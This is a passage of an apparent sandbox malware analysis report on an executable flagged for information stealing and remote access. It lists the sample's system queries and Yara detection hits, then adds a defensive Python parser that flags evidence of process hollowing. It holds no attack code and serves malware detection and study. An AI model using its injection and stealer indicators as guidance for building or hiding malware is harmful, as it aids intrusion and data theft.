Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\GV8EJooYMIgEnEk.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.GV8EJooYMIgEnEk.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a64cb0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566934966.0000000004790000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415734723.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.566609837.0000000000140000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.415434999.0000000001660000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.389518706.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000000.372050188.0000000007CDD000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343960936.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
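The two Yara-match lists above are the most useful evidence on the page for deciding what the sample actually did: the same rule fires on an unpacked PE at image base 0x400000 of process 3 and on memory dumps of that process where the page protection field is 0x40, in private rather than image-backed memory. That is the signature of a PE written into a hollowed child rather than loaded from disk. The following Python helper is an added example (not part of this report and not Joe Sandbox code) that parses those lines so the evidence can be grouped by process and page protection instead of read by eye. The interpretation of the dotted `.sdmp` name fields (process index, stage, dump id, base address, page protection, an unused field, memory type, an unused field) and of stage 0 and 2 as dumps at process start and end is an assumption based on the naming convention visible in this report; the PAGE_* and MEM_* values are the documented Windows constants. The sample lines embedded in the block are a constructed subset of the lines above.

```python
"""Group Joe Sandbox "Yara match File source:" lines by process and page protection.

Added example, not part of the report or of Joe Sandbox. The .sdmp field
layout and the meaning of the stage field are assumptions drawn from the
names seen in the report; PAGE_* / MEM_* values are documented Windows
constants (VirtualQuery protection and allocation-type values).
"""
import re
from typing import Optional

# Constructed subset of the report's own Yara-match lines.
SAMPLE_LINES = """\
Source: Yara match File source: 3.0.GV8EJooYMIgEnEk.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.GV8EJooYMIgEnEk.exe.3a0a690.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.566987802.0000000004A90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.346719302.00000000038B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000000.343584977.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.414374304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
"""

# Documented Windows memory-protection and allocation-type constants.
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

LINE_RE = re.compile(r"^Source: Yara match File source: (\S+), type: (\w+)\s*$")
# Assumed layout: proc.stage.dumpid.address.protect.unused.memtype.unused.sdmp
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.(\d+)\.([0-9A-Fa-f]{16})"
    r"\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$")
# Assumed layout: proc.stage.<image name>.<hex address>.<index>[.raw].unpack
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+)\.([0-9A-Fa-f]+)\.(\d+)(?:\.raw)?\.unpack$")


def parse_source(name: str, kind: str) -> Optional[dict]:
    """Decode one file-source name; returns None if the name is not understood."""
    if kind == "MEMORY":
        m = SDMP_RE.match(name)
        if not m:
            return None
        protect = int(m.group(5), 16)
        mem_type = int(m.group(7), 16)
        return {
            "kind": kind,
            "process": int(m.group(1), 16),   # process index in the analysis
            "stage": int(m.group(2), 16),     # assumption: 0 = start, 2 = end
            "address": int(m.group(4), 16),
            "protect": PAGE_PROTECT.get(protect, hex(protect)),
            "executable": protect in EXECUTABLE,
            "mem_type": MEM_TYPE.get(mem_type, hex(mem_type)),
        }
    if kind == "UNPACKEDPE":
        m = UNPACK_RE.match(name)
        if not m:
            return None
        return {
            "kind": kind,
            "process": int(m.group(1)),
            "stage": int(m.group(2)),
            "image": m.group(3),
            "address": int(m.group(4), 16),
            "raw": name.endswith(".raw.unpack"),
        }
    return None


def parse_report(text: str) -> list:
    """All decodable Yara-match entries in a block of report text."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            parsed = parse_source(m.group(1), m.group(2))
            if parsed:
                hits.append(parsed)
    return hits


def executable_memory_hits(text: str) -> list:
    """(process, address, memory type) of every MEMORY hit in executable pages."""
    found = {(h["process"], h["address"], h["mem_type"])
             for h in parse_report(text) if h["kind"] == "MEMORY" and h["executable"]}
    return sorted(found)


def hollowed_image_bases(text: str) -> list:
    """(process, address) matched both as an unpacked PE and in RWX private memory
    of the same process: a PE written into the process, not mapped from disk."""
    hits = parse_report(text)
    pe_bases = {(h["process"], h["address"]) for h in hits if h["kind"] == "UNPACKEDPE"}
    rwx_private = {(h["process"], h["address"]) for h in hits
                   if h["kind"] == "MEMORY"
                   and h["protect"] == "PAGE_EXECUTE_READWRITE"
                   and h["mem_type"] == "MEM_PRIVATE"}
    return sorted(pe_bases & rwx_private)


if __name__ == "__main__":
    for proc, addr, mem_type in executable_memory_hits(SAMPLE_LINES):
        print(f"process {proc}: executable Yara hit at {addr:#x} ({mem_type})")
    for proc, addr in hollowed_image_bases(SAMPLE_LINES):
        print(f"process {proc}: PE at {addr:#x} lives in RWX private memory")
```

On the constructed subset this reports process 3 with the matched PE at 0x400000 in RWX private memory at both the start and end dumps, and process 10 with an executable hit in mapped memory; process 0's hit sits in a read/write private region, which is where the decrypted payload would be staged before injection. Run it against the full list above to confirm the same grouping on the real data.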